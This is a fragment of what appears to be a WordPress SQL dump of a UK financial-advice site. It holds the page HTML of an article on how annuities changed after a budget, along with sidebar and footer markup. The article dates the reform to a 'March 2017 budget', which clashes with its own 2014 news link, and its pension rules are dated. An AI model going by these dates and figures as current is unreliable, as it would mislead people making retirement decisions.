onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"/WcBxvj97f6ImTTzlT4h-unuce5ZXpmlrf0JzFKpvBWJyilIlbrxaszuw0Y2NMVq3U1GZSw9_oe6GL-pXCIamWAg_s0.jpg\"/></a><script type=\"text/javascript\" src=\"/leadbox-690.js\"/></div>&#13;\n		</div>	</div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Our Latest Posts</p>		<ul><li>&#13;\n				<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/5-facts-know-annuities\">5 Facts You Should Know About Annuities</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/new-individual-savings-accounts-qa\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/automatic-enrolment\">What is Automatic Enrolment</a>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\"><p>Contact Info</p>		<div class=\"contact-info-container\">&#13;\n				<p class=\"address\">Manchester &amp; London</p>&#13;\n		&#13;\n				<p class=\"phone\">Phone: </p>&#13;\n		&#13;\n		&#13;\n		&#13;\n				<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>&#13;\n		&#13;\n				&#13;\n				</div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-22\" class=\"footer-widget-col widget_text\"><p>Download Your FREE Retirement Guides</p>			<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/1435eb973f72a2%3A125d9572eb46dc/5753952654065664/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"/w3QPpbD3DJXcyqPrBaexcUOnTpQKlOX0XuzNYejlD3Hwl1wrM5qbyjoyp4eUJt-wEdlJsAojFjru39Y0ZjrDnA_s0.jpg\"/></a><script type=\"text/javascript\" src=\"/leadbox-689.js\"/></div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col last\"/></section></div>&#13;\n	</footer><footer id=\"footer\"/></div><!-- wrapper -->&#13;\n	&#13;\n	<script type=\"text/javascript\" src=\"/maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[\r\njQuery(window).load(function() {\r\n\r\njQuery( \'#wooslider-id-1\' ).flexslider2({namespace: \"wooslider-\"\r\n, animation: \'fade\', slideshowSpeed: 7000, animationSpeed: 600, slideshow: true, directionNav: true, keyboard: false, mousewheel: false, pausePlay: false, randomize: false, animationLoop: true, pauseOnAction: true, pauseOnHover: false, smoothHeight: false, touch: true, controlNav: true});\r\n\r\n});\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"/wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/main.js\"/></body>','&#13;	G-day - Impact of the Gender Directive on Insurance','The cost of some UK Insurance Protection will go up by 25% on December 21 2012 – Find out how it could affect you and how to beat the rise.','inherit','closed','closed','','66-revision-v1','','','2017-09-21 17:35:45','2017-09-21 17:35:45','',66,'http://www.equalitywalk.org.uk/66-revision-v1',0,'revision','',0),(328,1,'2017-09-21 17:35:59','2017-09-21 17:35:59','<body class=\"single single-post postid-8787 single-format-standard light  wpb-js-composer js-comp-ver-4.1.2 vc_responsive\" data-spy=\"scroll\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n								&#13;\n						<div id=\"sliders-container\">&#13;\n									</div>&#13;\n		&#13;\n			<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										How Annuities Have Changed Since The Budget										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li><a href=\"../category/wealth-management/\" title=\"Wealth Management\">Wealth Management</a></li><li><a href=\"../category/pensions/\" title=\"Pensions\">Pensions</a></li><li><a href=\"../category/annuities/\" title=\"Annuities\">Annuities</a></li><li>How Annuities Have Changed Since The Budget</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n																			<div id=\"main\" class=\"clearfix \" style=\"\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n		&#13;\n										<div id=\"post-8787\" class=\"post-8787 post type-post status-publish format-standard has-post-thumbnail hentry category-annuities category-pensions category-wealth-management post\">&#13;\n												<span class=\"entry-title\" style=\"display: none;\">How Annuities Have Changed Since The Budget</span>&#13;\n						<div class=\"post-content\">&#13;\n				<h2><span id=\"current_wiki_title\">How Annuities Have Changed Since The Budget</span></h2>&#13;\n<p>Good news, annuities are no longer compulsory.<br/></p>&#13;\n&#13;\n<p/>&#13;\n<p/>&#13;\n<p>Annuity is a term that until recently everyone had heard of but few of us not of retirement age knew what it meant. The March 2017 budget changed that. Suddenly annuities became big news and exciting stories about the possibility of Lamborghini driving pensioners were splashed across the <a href=\"http://www.theguardian.com/money/2014/mar/29/lamborghini-tax-pension-changes-annuities\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-article\',\'http://www.theguardian.com\']);\">newspapers</a>.</p>&#13;\n<p>This article is a quick look at the changes to annuities and how they will affect you, so the first thing to do is to explain specifically what annuities are, and how they have changed.</p>&#13;\n<p/>&#13;\n<p/>&#13;\n<p>An annuity is an insurance policy that people saving for their retirement can buy at retirement and it will guarantee a fixed annual payment for life, so it essentially acts as a private payment. Here are the five changes you need to know about.</p>&#13;\n<p/>&#13;\n<p><span style=\"color: #0000ff;\">1) Annuities Are No Longer Compulsory</span></p>&#13;\n<p>On certain types of pension, an annuity policy has been mandatory in the past. Defined contribution pensions have been subject to hefty penalties for savers who have not opted into an annuity, whereas state pensions and final salary pensions have been exempt.</p>&#13;\n<p>The mandatory nature of this policy has obviously been very popular with the insurance companies, who have seen a fixed and sizeable amount of money flow into their coffers every year.</p>&#13;\n<p>To bring annuities policy on defined contribution pensions into line with other types of pension, the Chancellor of the Exchequer George Osborne has removed penalties for retirees who don’t take a policy out.</p>&#13;\n<p/>&#13;\n<p><span style=\"color: #0000ff;\">2) Good News For Retirees, Bad News For The Insurance Industry</span></p>&#13;\n<p>The changes that the government has introduced allow greater flexibility for pensioners who are planning their futures, but they have hit the insurance companies hard, with <a href=\"http://news.sky.com/story/1228619/pension-firms-lose-billions-after-speech\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-article\',\'http://news.sky.com\']);\">nearly £5bn</a>wiped off share prices following the announcement.</p>&#13;\n<p>Having greater flexibility in your pension plans can only be a good thing, despite sensational tabloid headlines that now pensioners could access their entire fund in a lump sum and buy a racehorse, yacht or luxury car with it.</p>&#13;\n<p>Most retirees will be far more sensible than this; the new rules could enable them to spend a portion of their overall pension on paying off outstanding mortgages and debts.</p>&#13;\n<p/>&#13;\n<p><span style=\"color: #0000ff;\">3) You Can Buy An Annuity If You Want One</span></p>&#13;\n<p>It must be said here that annuities haven’t been banned, plenty of people will still purchase them and get good use out of such policies.</p>&#13;\n<p>By removing the punitive charges on defined contribution pensions that don’t have an annuity policy, savers have the opportunity to use some of their lump sum for other purposes before purchasing an annuity if they choose.</p>&#13;\n<p>There are of course alternatives to buying annuities which may be worth investigating, the main two being the capped and flexible draw down plans.</p>&#13;\n<p>These policies allow you to keep your wealth invested but to draw in income from it as well. The capped drawdown has a fixed limit on how much can be withdrawn, which will be a percentage of the limit set by the Government Actuary Department.</p>&#13;\n<p>This figure is set based on the age of the saver and the percentage of it that can be drawn down can be anywhere between zero and 150 percent of this. If this seems restrictive, then a flexible drawdown policy may allow you to access an unlimited amount of the pension pot as you see fit.</p>&#13;\n<p/>&#13;\n<p><span style=\"color: #0000ff;\">4) Joint Annuities Are Also Worth Considering</span></p>&#13;\n<p>If you are married or in a civil partnership, it might be worth considering taking out a joint annuity policy together if you are both retiring at roughly the same time.</p>&#13;\n<p>When one or other partner passes away in later life, the surviving retiree will continue to receive payments based on the combined contribution of both pensioners to the annuity policy.</p>&#13;\n<p>This means that the right policy can potentially act as an annuity and, to some degree as a life insurance policy (however, as with all such things, it is important to read the terms and conditions and ensure this is a suitable policy for you). As insurers are likely to have to pay a policy for longer, you can be sure they will make their money back in one way or another, either with higher fees or lower annual rates.</p>&#13;\n<p/>&#13;\n<p><span style=\"color: #0000ff;\">5) Annuities And Long Term Care</span></p>&#13;\n<p>Whilst the market for annuities has been liberalised there are still several good reasons for considering such policies, the main one being the cost of long term old age care.</p>&#13;\n<p>A long term care annuity works much like any other annuity policy but is typically not paid directly to the policy holder.</p>&#13;\n<p>Instead it will be paid out directly to the care provider, meaning that if in the event of infirmity in old age, the policy holder is not saddled with the responsibility of arranging care payments.</p>&#13;\n<p>Overall there is much to be positive about in the annuities market, they are still useful financial products, but since the end of the virtually compulsory enforcement of the annuity, insurers will have to offer more competitive deals to secure your custom.</p>&#13;\n<p>If you would like to discuss whether such a move might be the right option for you and your family, then – as always – we are only a phone call or an e-mail away.</p>&#13;\n							</div>&#13;\n									<div class=\"meta-info\">&#13;\n				<div class=\"vcard\">&#13;\n					By <span class=\"fn\"><a href=\"../author/paul/\" title=\"Posts by Becky Barnet\" rel=\"author\"/></span><span class=\"sep\">|</span>Categories: <a href=\"../category/annuities/\" title=\"View all posts in Annuities\" rel=\"category tag\">Annuities</a>, <a href=\"../category/pensions/\" title=\"View all posts in Pensions\" rel=\"category tag\">Pensions</a>, <a href=\"../category/wealth-management/\" title=\"View all posts in Wealth Management\" rel=\"category tag\">Wealth Management</a><span class=\"sep\">|</span><span class=\"meta-tags\">Tags: </span><span class=\"sep\">|</span><a href=\"../5-facts-know-annuities/\" title=\"Comment on How Annuities Have Changed Since The Budget\">0 Comments</a>				</div>&#13;\n			</div>&#13;\n												<div class=\"share-box\">&#13;\n				<h4> </h4>&#13;\n				<ul class=\"social-networks social-networks-dark\"><li class=\"facebook\">&#13;\n						<a href=\"http://www.facebook.com/sharer.php?m2w&amp;s=100&amp;p[url]=http://www.equalitywalk.org.uk/5-facts-know-annuities/&amp;p[title]=How%20Annuities%20Have%20Changed%20Since%20The%20Budget\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Facebook&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Facebook</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"twitter\">&#13;\n						<a href=\"http://twitter.com/home?status=How+Annuities+Have+Changed+Since+The+Budget%20http://www.equalitywalk.org.uk/5-facts-know-annuities/\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Twitter&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Twitter</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"linkedin\">&#13;\n						<a href=\"http://linkedin.com/shareArticle?mini=true&amp;url=http://www.equalitywalk.org.uk/5-facts-know-annuities/&amp;title=How%20Annuities%20Have%20Changed%20Since%20The%20Budget\" target=\"_blank\" rel=\"nofollow\">&#13;\n							LinkedIn&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>LinkedIn</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"reddit\">&#13;\n						<a href=\"http://reddit.com/submit?url=http://www.equalitywalk.org.uk/5-facts-know-annuities/&amp;title=How%20Annuities%20Have%20Changed%20Since%20The%20Budget\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Reddit&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Reddit</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tumblr\">&#13;\n						<a href=\"http://www.tumblr.com/share/link?url=http%3A%2F%2Fwww.equalitywalk.org.uk%2F5-facts-know-annuities%2F&amp;name=How+Annuities+Have+Changed+Since+The+Budget&amp;description=This+article+looks+at+the+changes+to+annuities+and+how+they+will+affect+you%2C+so+the+first+thing+to+do+is+to+explain+specifically+what+they+are+and+how+they+have+changed...\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Tumblr&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Tumblr</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"google\">&#13;\n						<a href=\"https://plus.google.com/share?url=http://www.equalitywalk.org.uk/5-facts-know-annuities/\" onclick=\"javascript:window.open(this.href,&#13;&#10;  \'\', \'menubar=no,toolbar=no,resizable=yes,scrollbars=yes,height=600,width=600\');return false;\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Google +1&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Google +1</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tf-pinterest\">&#13;\n												<a href=\"#\">&#13;\n							Pinterest&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Pinterest</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"email\">&#13;\n						<a href=\"mailto:?subject=How Annuities Have Changed Since The Budget&amp;body=http://www.equalitywalk.org.uk/5-facts-know-annuities/\">&#13;\n							Email&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Email</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n									</ul></div>&#13;\n									<div class=\"about-author\">&#13;\n				<div class=\"title\"><h2>About the Author: <a href=\"../author/paul/\" title=\"Posts by Becky Barnet\" rel=\"author\"/></h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div>&#13;\n				<div class=\"about-author-container\">&#13;\n					<div class=\"avatar\">&#13;\n											</div>&#13;\n					<div class=\"description\"/>&#13;\n				</div>&#13;\n			</div>&#13;\n			&#13;\n												&#13;\n							&#13;\n<!-- You can start editing here. -->&#13;\n&#13;\n&#13;\n			<!-- If comments are open, but there are no comments. -->&#13;\n&#13;\n	 &#13;\n&#13;\n&#13;\n									<div id=\"respond\" class=\"comment-respond\">&#13;\n				<h3 id=\"reply-title\" class=\"comment-reply-title\"><div class=\"title\"><h2> </h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div> <small><a rel=\"nofollow\" id=\"cancel-comment-reply-link\" href=\"../5-facts-know-annuities/\" style=\"display:none;\">Cancel reply</a></small>&#13;\n									&#13;\n							</h3></div><!-- #respond -->&#13;\n			        <script type=\"text/javascript\"><![CDATA[\r\n            jQuery(document).ready(function () {\r\n                jQuery(\'#commentform\').submit(function () {\r\n                    _gaq.push(\r\n                            [\'_setAccount\', \'UA-10958181-3\'],\r\n                            [\'_trackEvent\', \'comment\', \'submit\']\r\n                    );\r\n                });\r\n            });\r\n        ]]></script></div>&#13;\n			</div>&#13;\n		<div id=\"sidebar\" style=\"float:right;\">&#13;\n	<div id=\"text-24\" class=\"widget widget_text\">			<div class=\"textwidget\"><center><big><big><big>JOIN OVER 5,000</big></big></big><br/><br/>people who get our best financial wisdom on a weekly basis.</center><br/><a href=\"https://my.leadpages.net/leadbox/1449111f3f72a2%3A125d9572eb46dc/5763711893504000/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"/><script type=\"text/javascript\" src=\"../leadbox-694.js\"/></div>&#13;\n		</div><div id=\"recent_works-widget-2\" class=\"widget recent_works\"><div class=\"heading\"><p>New Guides</p></div>		<div class=\"recent-works-items clearfix\">&#13;\n										<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		</div><div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\">		<div class=\"tab-holder\">&#13;\n			<div class=\"tab-hold tabs-wrapper\">&#13;\n				<ul id=\"tabs\" class=\"tabset tabs\"><li><a href=\"#tab-popular\">Popular</a></li>&#13;\n															<li><a href=\"#tab-recent\">Recent</a></li>&#13;\n														</ul><div class=\"tab-box tabs-container\">&#13;\n										<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">Can I sell my Pension under 55?</a>&#13;\n									<div class=\"meta\">&#13;\n										October 12th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../best-annuity-rates/\">&#13;\n										<img width=\"52\" height=\"43\" src=\"../wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../best-annuity-rates/\">What Are The Best Annuity Rates in The UK</a>&#13;\n									<div class=\"meta\">&#13;\n										March 21st, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\n									<div class=\"meta\">&#13;\n										September 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">&#13;\n										<img width=\"52\" height=\"21\" src=\"../wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\n									<div class=\"meta\">&#13;\n										September 18th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n									<div class=\"meta\">&#13;\n										September 5th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n															<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n									<div class=\"meta\">&#13;\n										June 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../5-facts-know-annuities/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../5-facts-know-annuities/\">How Annuities Have Changed Since The Budget</a>&#13;\n									<div class=\"meta\">&#13;\n										June 9th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../staging-date-social-advisors/\">When is your Staging Date Social Advisors</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n														</div>&#13;\n			</div>&#13;\n		</div>&#13;\n		</div><div id=\"categories-3\" class=\"widget widget_categories\"><div class=\"heading\"><p>Post Categories</p></div><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (2)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (5)</option><option class=\"level-0\" value=\"5\">Investments  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (9)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"33\">Video  (4)</option><option class=\"level-0\" value=\"1\">Wealth Management  (17)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\n	var dropdown = document.getElementById(\"cat\");\r\n	function onCatChange() {\r\n		if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></div><div id=\"social_links-widget-2\" class=\"widget social_links\"><div class=\"heading\"><p>Get Social</p></div>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"_blank\" rel=\"nofollow\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"_blank\" rel=\"nofollow\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																								</ul></div><div id=\"text-23\" class=\"widget widget_text\">			<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/14392e473f72a2%3A125d9572eb46dc/5699942098141184/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"../WcBxvj97f6ImTTzlT4h-unuce5ZXpmlrf0JzFKpvBWJyilIlbrxaszuw0Y2NMVq3U1GZSw9_oe6GL-pXCIamWAg_s0.jpg\"/></a><script type=\"text/javascript\" src=\"../leadbox-690.js\"/></div>&#13;\n		</div>	</div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Our Latest Posts</p>		<ul><li>&#13;\n				<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../5-facts-know-annuities/\">How Annuities Have Changed Since The Budget</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n						<ul><li><a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n					      </li>&#13;\n					  </ul></li>&#13;\n					</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\"><p>Contact Info</p>		<div class=\"contact-info-container\">&#13;\n				<p class=\"address\">Manchester &amp; London</p>&#13;\n		&#13;\n				<p class=\"phone\">Phone: </p>&#13;\n		&#13;\n		&#13;\n		&#13;\n				<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>&#13;\n		&#13;\n				&#13;\n				</div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div style=\"clear:both;\"/></article></section></div>				&#13;\n&#13;\n				<article class=\"col last\"/></footer><footer id=\"footer\"/><!-- wrapper --><script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[\r\njQuery(window).load(function() {\r\n\r\njQuery( \'#wooslider-id-1\' ).flexslider2({namespace: \"wooslider-\"\r\n, animation: \'fade\', slideshowSpeed: 7000, animationSpeed: 600, slideshow: true, directionNav: true, keyboard: false, mousewheel: false, pausePlay: false, randomize: false, animationLoop: true, pauseOnAction: true, pauseOnHover: false, smoothHeight: false, touch: true, controlNav: true});\r\n\r\n});\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script 